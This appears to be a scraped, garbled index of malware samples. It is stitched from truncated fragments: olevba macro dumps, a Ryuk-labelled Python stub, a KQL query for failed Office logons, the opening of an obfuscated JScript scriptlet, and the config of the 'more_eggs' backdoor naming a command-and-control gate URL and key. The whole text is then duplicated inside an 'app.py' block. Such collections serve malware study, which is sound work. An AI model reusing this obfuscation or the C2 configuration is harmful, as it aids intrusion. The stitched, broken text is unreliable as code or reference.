Seclib seclib

## ca4f62279d6c7b7f8f7f37b97391f
import subprocess
import re
import binascii
import socket
import struct
import threading
import os
import random
import platform
import decimal

## c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740.bas
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
===============================================================================
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------

## VbaProject.OTM

olevba 0.54.2 on Python 3.7.2 - http://decalage.info/python/oletools
===============================================================================
7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisOutlookSession.cls
7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4 - OLE stream: 'OutlookVbaData/VBA/ThisOutlookSession'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

## shellcode.xlsm
BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL

1. Open Excel
2. Click on the active tab
3. Select "Insérer"
4. Click on "Macro MS Excel 4.0".
5. This will create a new worksheet called "Macro1"

================================================================================
In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:

## ryuk.py
# -*- coding: utf-8 -*-

from __future__ import print_function
import os
import sys

debug = 0


def excepthook(exception_type, exception, traceback):

## attack.csl
let valid_logons = (OfficeActivity
    | where TimeGenerated > ago(30d)
    | where Operation == 'UserLoggedIn'
    | summarize by ClientIP);
let only_invalid_logons = (OfficeActivity
    | where TimeGenerated > ago(30d)
    | where Operation == 'UserLoginFailed'
    | summarize by ClientIP)
    | join kind=anti (valid_logons) on ClientIP;
OfficeActivity

## Scriptlet Decoded
<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
<registration
progid="obLrn.U3rY5s"
classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
<script language="JScript" >
function iZjDo3k(jfi2VxX){var rJK4Qm = "";var h8Oy = 0;for (h8Oy = jfi2VxX.length - 1; h8Oy >= 0; h8Oy -= 1){rJK4Qm += jfi2VxX.charAt(h8Oy);}return rJK4Qm;}function yZY8ddf(kJYu) {var q2XJc = "r";var kKfG = "C";var fu = [];var keFQz9Vbm2 = "o";fu[0] = "f" + q2XJc + keFQz9Vbm2 + "m";fu[1] = kKfG + "ha";fu[2] = q2XJc + kKfG;fu[3] = keFQz9Vbm2 + "de";var dmDU5P = fu[0] + fu[1] + fu[2] + fu[3];var mmeF5Ap = String;return mmeF5Ap[dmDU5P](kJYu);}function xP035QGgN(ag){return "+" ==ag?62:"/"==ag?63:vm27C7HmF.indexOf(ag);}function ph6T0AN(fIImISnUlb){var vpq8QW3uBI;var mRIs;var xYYT7RMqs;var hQtefhUl;var tgHARy;var sDBrnzbZ4I = "";for(vpq8QW3uBI = 0;vpq8QW3uBI<fIImISnUlb.length-3;vpq8QW3uBI += 4){mRIs=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+0));xYYT7RMqs=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+1));hQtefhUl=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+2));tgHARy=xP0

## JS Terra Loader aka more_eggs backdoor
var BV = "6.0";
var Gate = "https://tonsandmillions.com/sendanalytics-28529/info";
var hit_each = 1;
var error_retry = 2;
var restart_h = 4;
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
var Rkey = "ZkY3egXBulkogSbGEHqA";
var rcon_now = 0;
var gtfo = false;
var selfdel = false;

## e6f5r65t9n87r9u7yr87u
##Uploader by satya_enki
## Sample evolution:
## c2e126498e61d4dc4154b5721dfd9811cd1d8c84063477e271134f0ed30e29ea
## df7fc66bcceaf9b041fe839b5cda95dfad14c8475c6e2ec49dc23d5ae3ba62ac
## b621015caa6077d7e85807c7f1509f88d5560d3e4ef439f578edc43f7b01c071
## 7d2bf283d12bc6914708e2a4240c2cefbd1871c3b4ac3c9b2a70ea7553fb7f4a
## 13fc853eb0e59b8133f93a3f55ed4086ffa8545aecef513f0bfe8363467fb110
## 5e53334b062c7c908a7354c77343e7d356959727930f2557b5e65b936b2cd462

olevba3 0.53.1 - http://decalage.info/python/oletools

## adware

## uploaded by @satya_enki
## sample hashes: 23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476, 9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7
## links:
##    https://www.reverse.it/sample/23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476?environmentId=100
##    https://www.reverse.it/sample/9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7?environmentId=100
##    Also mentioned here: http://www.programmersforum.ru/showthread.php?t=310934
##    https://forums.malwarebytes.com/topic/200388-removal-instructions-for-fast-approach-tt/

## contents of app.py (49e766121a201104f05d3ebb5fdd9e8f337615c9d3a6177bd83539da8405ecbd):
	import subprocess
	import re
	import binascii
	import socket
	import struct
	import threading
	import os
	import random
	import platform
	import decimal
	olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools
	===============================================================================
	FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740
	Type: OpenXML
	-------------------------------------------------------------------------------
	VBA MACRO ThisWorkbook.cls
	in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	(empty macro)
	-------------------------------------------------------------------------------

	olevba 0.54.2 on Python 3.7.2 - http://decalage.info/python/oletools
	===============================================================================
	7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4
	Type: OLE
	-------------------------------------------------------------------------------
	VBA MACRO ThisOutlookSession.cls
	7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4\7b69d70e57ea7f560d35218150f59c211b6e3f007c632bffcc56ea9dac4467c4 - OLE stream: 'OutlookVbaData/VBA/ThisOutlookSession'
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
	BEWARE: THIS WILL ONLY WORK IN A FRENCH VERSION OF MS-OFFICE/EXCEL

	1. Open Excel
	2. Click on the active tab
	3. Select "Insérer"
	4. Click on "Macro MS Excel 4.0".
	5. This will create a new worksheet called "Macro1"

	================================================================================
	In the Macro1 worksheet, paste the following block in cells in column A, starting in cell A1:
	# -- coding: utf-8 --

	from __future__ import print_function
	import os
	import sys

	debug = 0


	def excepthook(exception_type, exception, traceback):
	let valid_logons = (OfficeActivity
	\| where TimeGenerated > ago(30d)
	\| where Operation == 'UserLoggedIn'
	\| summarize by ClientIP);
	let only_invalid_logons = (OfficeActivity
	\| where TimeGenerated > ago(30d)
	\| where Operation == 'UserLoginFailed'
	\| summarize by ClientIP)
	\| join kind=anti (valid_logons) on ClientIP;
	OfficeActivity
	<component id="afgwwZzDmK9fxaJdvFovs8GYLrqj" >
	<registration
	progid="obLrn.U3rY5s"
	classid="{783B20D9-521E-9B68-FF17-33FF120E86D6}" >
	<script language="JScript" >
	function iZjDo3k(jfi2VxX){var rJK4Qm = "";var h8Oy = 0;for (h8Oy = jfi2VxX.length - 1; h8Oy >= 0; h8Oy -= 1){rJK4Qm += jfi2VxX.charAt(h8Oy);}return rJK4Qm;}function yZY8ddf(kJYu) {var q2XJc = "r";var kKfG = "C";var fu = [];var keFQz9Vbm2 = "o";fu[0] = "f" + q2XJc + keFQz9Vbm2 + "m";fu[1] = kKfG + "ha";fu[2] = q2XJc + kKfG;fu[3] = keFQz9Vbm2 + "de";var dmDU5P = fu[0] + fu[1] + fu[2] + fu[3];var mmeF5Ap = String;return mmeF5Ap[dmDU5P](kJYu);}function xP035QGgN(ag){return "+" ==ag?62:"/"==ag?63:vm27C7HmF.indexOf(ag);}function ph6T0AN(fIImISnUlb){var vpq8QW3uBI;var mRIs;var xYYT7RMqs;var hQtefhUl;var tgHARy;var sDBrnzbZ4I = "";for(vpq8QW3uBI = 0;vpq8QW3uBI<fIImISnUlb.length-3;vpq8QW3uBI += 4){mRIs=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+0));xYYT7RMqs=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+1));hQtefhUl=xP035QGgN(fIImISnUlb.charAt(vpq8QW3uBI+2));tgHARy=xP0
	var BV = "6.0";
	var Gate = "https://tonsandmillions.com/sendanalytics-28529/info";
	var hit_each = 1;
	var error_retry = 2;
	var restart_h = 4;
	var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each);
	var Rkey = "ZkY3egXBulkogSbGEHqA";
	var rcon_now = 0;
	var gtfo = false;
	var selfdel = false;
	##Uploader by satya_enki
	## Sample evolution:
	## c2e126498e61d4dc4154b5721dfd9811cd1d8c84063477e271134f0ed30e29ea
	## df7fc66bcceaf9b041fe839b5cda95dfad14c8475c6e2ec49dc23d5ae3ba62ac
	## b621015caa6077d7e85807c7f1509f88d5560d3e4ef439f578edc43f7b01c071
	## 7d2bf283d12bc6914708e2a4240c2cefbd1871c3b4ac3c9b2a70ea7553fb7f4a
	## 13fc853eb0e59b8133f93a3f55ed4086ffa8545aecef513f0bfe8363467fb110
	## 5e53334b062c7c908a7354c77343e7d356959727930f2557b5e65b936b2cd462

	olevba3 0.53.1 - http://decalage.info/python/oletools

	## uploaded by @satya_enki
	## sample hashes: 23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476, 9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7
	## links:
	## https://www.reverse.it/sample/23a6dea312426fa0f5ec60581c23359b66cd13e2a7c14a5e5d5173dafd0fc476?environmentId=100
	## https://www.reverse.it/sample/9d7b60d008f46894d60800ce6f68533f8f1e5d2613f10512df6786e958d5a7f7?environmentId=100
	## Also mentioned here: http://www.programmersforum.ru/showthread.php?t=310934
	## https://forums.malwarebytes.com/topic/200388-removal-instructions-for-fast-approach-tt/

	## contents of app.py (49e766121a201104f05d3ebb5fdd9e8f337615c9d3a6177bd83539da8405ecbd):